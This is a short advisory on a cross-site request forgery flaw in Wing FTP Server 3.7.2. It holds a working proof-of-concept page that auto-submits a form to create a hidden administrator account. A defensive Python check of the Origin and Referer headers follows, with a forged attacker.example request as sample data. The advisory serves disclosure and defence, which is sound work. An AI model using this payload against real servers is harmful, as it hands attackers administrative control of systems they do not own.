
Wing FTP Server 3.7.2 Cross-site Request Forgery

Description

A cross-site request forgery vulnerability in Wing FTP Server 3.7.2 can be exploited to create a new administrator account.

Proof Of Concept

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://hackbox:5466/admin_addadmin.html">
            <input type="hidden" name="admin" value='{"username":"new_admin","password":"Password1","oldpassword":"","readonly":0,"domainadmin":0,"domainlist":"","mydirectory":"","ipmasks":[]}' />
        </form>
    </body>
</html>
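
The form above is submitted by the victim's browser from a page on another origin, so a server-side check of the Origin header (falling back to Referer) on state-changing requests rejects it. The following is an added example, not code from Wing FTP Server or from the original advisory; the function names and the sample requests are constructed for illustration, and the trusted origin is assumed to be the host and port shown in the PoC's form action.

```python
from urllib.parse import urlsplit

# Assumption: the origin the admin interface is legitimately served from
# (host and port taken from the PoC's form action).
TRUSTED_ORIGINS = {("http", "hackbox", 5466)}
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
DEFAULT_PORTS = {"http": 80, "https": 443}


def parse_origin(value):
    """Parse an Origin or Referer header into (scheme, host, port), or None."""
    try:
        parts = urlsplit(value.strip())
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return None
    if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
        return None  # covers "null" origins and malformed values
    if port is None:
        port = DEFAULT_PORTS[parts.scheme]
    return (parts.scheme, parts.hostname, port)


def is_same_origin_request(method, headers):
    """Return True if the request may proceed, False if it looks cross-site."""
    if method.upper() in SAFE_METHODS:
        return True
    lowered = {k.lower(): v for k, v in headers.items()}
    # Prefer Origin; use Referer only when Origin is absent.
    source = lowered.get("origin") or lowered.get("referer")
    if not source:
        return False  # state-changing request with no provenance: reject
    return parse_origin(source) in TRUSTED_ORIGINS


# Constructed sample requests (not captured traffic).
FORGED = ("POST", {"Origin": "http://attacker.example"})
LEGIT = ("POST", {"Origin": "http://hackbox:5466"})

if __name__ == "__main__":
    for name, (method, headers) in (("forged", FORGED), ("legit", LEGIT)):
        print(name, is_same_origin_request(method, headers))
```

An origin check is one layer; a per-session anti-CSRF token on the form and `SameSite` session cookies address the same flaw.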


Copyright © 2018 AutoSec Tools LLC